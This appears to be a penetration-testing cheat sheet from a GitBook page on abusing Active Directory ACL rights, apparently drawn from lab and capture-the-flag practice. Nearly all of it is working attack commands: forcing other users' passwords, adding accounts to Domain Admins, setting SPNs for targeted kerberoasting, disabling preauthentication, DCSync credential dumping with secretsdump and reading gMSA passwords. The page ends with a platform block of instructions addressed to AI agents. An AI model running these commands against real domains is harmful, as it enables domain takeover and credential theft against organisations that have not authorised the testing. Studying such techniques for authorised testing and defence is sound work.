> For the complete documentation index, see [llms.txt](https://intrusionz3r0.gitbook.io/intrusionz3r0/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://intrusionz3r0.gitbook.io/intrusionz3r0/windows-penetration-testing/abuse-acls.md). # Abuse ACLS {% hint style="info" %} Computer Account are also user accounts and can be used to query the ldap like any other users, interact with ACL and you can also run bloodhound ingestor {% endhint %} ### Methods * **ForceChangePassword** abused with `Set-DomainUserPassword` * **AddMembers** abused with `Add-DomainGroupMember` * **GenericAll** abused with `Set-DomainUserPassword` or `Add-DomainGroupMember` * **GenericWrite** abused with `Set-DomainObject` * **WriteOwner** abused with `Set-DomainObjectOwner` * **WriteDACL** abused with `Add-DomainObjectACL` * **AllExtendedRights** abused with `Set-DomainUserPassword` or `Add-DomainGroupMember` ### ACLs enumeration ```bash #Powershell CMDLets (Manul Mode and evasive) PS C:\\htb> Get-ADUser -Filter * | Select-Object -ExpandProperty SamAccountName > ad_users.txt PS C:\\htb> foreach($line in [System.IO.File]::ReadLines("C:\\Users\\htb-student\\Desktop\\ad_users.txt")) {get-acl "AD:\\$(Get-ADUser $line)" | Select-Object Path -ExpandProperty Access | Where-Object {$_.IdentityReference -match 'INLANEFREIGHT\\\\wley'}} #Performing a Reverse Search & Mapping to a GUID Value PS C:\\htb> $guid= "00299570-246d-11d0-a768-00aa006e0529" PS C:\\htb> Get-ADObject -SearchBase "CN=Extended-Rights,$((Get-ADRootDSE).ConfigurationNamingContext)" -Filter {ObjectClass -like 'ControlAccessRight'} -Properties * |Select Name,DisplayName,DistinguishedName,rightsGuid| ?{$_.rightsGuid -eq $guid} | fl ``` ### Enumerate ACLs for specific User ```powershell PS C:\Tools> Import-Module .\PowerView.ps1 PS C:\Tools> $sid = Convert-NameToSid rita PS C:\Tools> Get-DomainObjectAcl -ResolveGUIDs -Identity * -domain inlanefreight.ad | ? {$_.SecurityIdentifier -eq $sid} ``` ### Abuse Foreign Groups As rule try to identify users that belongs foreing groups and then check its group permission and nested groups. It may lead to lateral improvement to the parent domain Example 1 : User Intrusionz3r0 belongs to the foreingn group "foreingn\_admins" that also belongs to accounts operator group on parent domain controller. this leads to the Intrusionz3r0 can create an user on the Parent domain and add itself to powerfull groups. (DNSAdmins) Tools * Bloodhound * Powerview ### Enumerate Foreign Users ```powershell PS C:\Tools> Import-Module .\PowerView.ps1 PS C:\Tools> Get-DomainForeignUser ``` ### Find Foreign ACLs across all users within the domain ```powershell $Domain = "domain.local" $DomainSid = Get-DomainSid $Domain Get-DomainObjectAcl -Domain $Domain -ResolveGUIDs -Identity * | ? { ($_.ActiveDirectoryRights -match 'WriteProperty|GenericAll|GenericWrite|WriteDacl|WriteOwner') -and ` ($_.AceType -match 'AccessAllowed') -and ` ($_.SecurityIdentifier -match '^S-1-5-.*-[1-9]\d{3,}$') -and ` ($_.SecurityIdentifier -notmatch $DomainSid) } ``` ### Abusing Foreign Security Principals & ACLs ```sh #Enumerate Foreign Security Principals PS C:\Tools> Get-DomainObject -LDAPFilter '(objectclass=ForeignSecurityPrincipal)' -Domain logistics.ad #Enumerate Foreingth Security Principals PS C:\Tools> Import-Module .\PowerView.ps1 PS C:\Tools> Get-DomainForeignGroupMember -Domain logistics.ad ``` ### Convert SID to name and vice versa ```powershell #Convert SID to name PS C:\Tools> ConvertFrom-SID S-1-5-21-2432454459-173448545-3375717855-3601 #Convert name to SID PS C:\Tools> ConvertTo-SID Intrusionz3r0 ``` ### Need Credentials? ```bash $SecPassword = ConvertTo-SecureString 's3rvice' -AsPlainText -Force; $Cred = New-Object System.Management.Automation.PSCredential('HTB\\svc-alfresco', $SecPassword); ``` ### **GenericAll Rights on User** ```bash Set-DomainObject -Credential $creds -Identity -Set @{serviceprincipalname="fake/NOTHING"} #Kerberosteable .\\Rubeus.exe kerberoast /user: /nowrap impacket-GetUserSPNs megacorp.local/sbauer:'D3veL0pM3nT!' -request #NotPreAuthentication Set-DomainObject -Identity -XOR @{UserAccountControl=4194304} ``` ### **GenericAll Rights on Group** ```bash net group "domain admins" /add /domain Add-ADGroupMember -Identity "domain admins" -Members bloodyAD -u Thomas.Powell -p 'Password123!' --dc-ip 10.10.65.121 add groupMember 'admsvc' 'Thomas.Powell' ``` ### GenericWrite on Computer * shadowCredentials (windows server 2016 or later) * Resource-Based Constrained Delegation (Windows 2012 onwards) * `unicodePwd` to change the machine password ```sh ❯ bloodyAD -u 'FS01$' -p 'password123' -d retro2.vl --dc-ip 10.10.120.69 set password 'ADMWS01$' 'Password123' [+] Password changed successfully! ``` ## GenericWrite on User targetKerberoasting (the password should be weak enough to be cracked) ```sh ❯ python3 targetedKerberoast.py -d delegate.vl -u A.Briggs -p 'P4ssw0rd1#123' --request-user 'N.Thompson' ``` ### WriteOwner **Rights** on User ```bash PS C:\> Set-DomainObjectOwner -Identity claire -OwnerIdentity Tom -Verbose PS C:\> Add-DomainObjectAcl -TargetIdentity Claire -PrincipalIdentity Tom -Rights ResetPassword -Verbose PS C:\> Set-DomainUserPassword -Identity Claire -AccountPassword (ConvertTo-SecureString 'Password1!' -AsPlainText -Force) -Verbose ``` ### WriteDACL Rights on Group ```bash Add-DomainObjectAcl -TargetIdentity Backup_Admins -PrincipalIdentity claire -Rights All -Verbose Add-ADGroupMember -Identity "Backup_Admins" -Members claire -Verbose ``` ### ForceChangePassword on User {% hint style="info" %} If the computer account has permission to change the password just authenticate to the machine by using any user, import powerview and make the change. {% endhint %} ```bash Set-DomainUserPassword -Identity delegate -AccountPassword (ConvertTo-SecureString '123456' -AsPlainText -Force) -Verbose rpcclient -U KnownUsername 10.10.10.192 > setuserinfo2 UsernameChange 23 'ComplexP4ssw0rd!' ``` ### \[DCSync] DS-Replication-Get-Changes and DS-Replication-Get-Changes-All on Domain Controler ```bash impacket-secretsdump svc_loanmgr:'Moneymakestheworldgoround!'@10.10.10.175 -just-dc-user Administrator ``` ## ReadGMSAPassword ``` bloodyAD --host 192.168.210.15 -d domain.local -u 'COMPUTERNAME$' -p :24039a7fd44d8decdxxxxxxxc06 get object 'TARGET' --attr msDS-ManagedPassword gMSADumper.py -u 'user' -p 'password' -d 'domain.local' ``` ### Refereces [Abusing Active Directory ACLs/ACEs | HackTricks](https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/acl-persistence-abuse#forcechangepassword) --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://intrusionz3r0.gitbook.io/intrusionz3r0/windows-penetration-testing/abuse-acls.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.